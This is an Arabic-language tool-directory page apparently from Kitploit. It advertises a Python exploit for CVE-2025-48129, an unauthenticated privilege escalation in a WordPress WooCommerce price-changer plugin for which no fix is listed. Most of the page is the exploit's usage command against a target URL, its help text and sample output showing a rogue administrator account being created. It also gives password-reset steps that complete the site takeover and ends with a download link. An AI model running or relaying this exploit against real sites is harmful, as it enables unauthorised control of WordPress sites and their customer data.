Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 معرضة لـ Privilege Escalation | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-48129
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 معرضة لـ Privilege Escalation

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2025-48129 - تصعيد الامتيازات في إضافة Spreadsheet Price Changer لووردبريس

🛡️ ملخص الثغرة

  • الإضافة المتأثرة: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • الإصدارات المعرضة للخطر: <= 2.4.37
  • الإصدار المُصحَّح: ❌ لا يوجد إصلاح رسمي متاح
  • اكتُشفت بواسطة: Patchstack | 20 مايو 2025
  • معرف CVE: CVE-2025-48129
  • درجة CVSS: 9.8 (حرجة)
  • أولوية التصحيح: 🔴 عالية

🔥 المخاطر

يمكن للمهاجمين غير الموثَّقين تصعيد الامتيازات عن طريق إنشاء حساب على مستوى المسؤول دون الحاجة إلى أي وصول مسبق. يتيح ذلك السيطرة الكاملة على موقع ووردبريس.

مصنف تحت: OWASP A7 – فشل التعريف والتوثيق


🧪 نظرة عامة على سكربت الاستغلال

يستهدف هذا السكربت بلغة بايثون الإصدارات المعرضة للخطر من الإضافة ويُسجِّل مسؤول ووردبريس جديد باستخدام بريد إلكتروني وكلمة مرور فقط (مشوَّشة عبر MD5).


▶️ مثال على الاستخدام

root@kitploit:~
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 تعليمات الاستخدام

root@kitploit:~
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ مثال على الإخراج الناجح

root@kitploit:~
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ ملاحظة مهمة

في بعض الحالات، قد يفشل تسجيل الدخول مباشرة باستخدام كلمة المرور المختارة.
هذا ليس خطأ في السكربت، بل ناتج عن كيفية تمرير الإضافة الضعيفة لكلمات المرور المشوَّشة إلى نظام إنشاء المستخدمين الداخلي لووردبريس.

إذا كنت غير قادر على تسجيل الدخول، قم ببساطة بإعادة تعيين كلمة المرور عبر البريد الإلكتروني باستخدام الرابط التالي:

root@kitploit:~
http://target-site.com/wordpress/wp-login.php?action=lostpassword

سيرسل ووردبريس بريدًا إلكترونيًا لإعادة تعيين كلمة المرور إلى حساب المسؤول الذي أنشأته للتو — مما يمنحك وصولاً كاملاً.


🧾 إخلاء مسؤولية قانوني

هذه الأداة مُقدمة لأغراض تعليمية واختبار الاختراق المصرح به فقط.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الضرر الناتج عن هذا السكربت.


بواسطة: Nxploited ( Khaled_alenazi )

تنزيل الأداة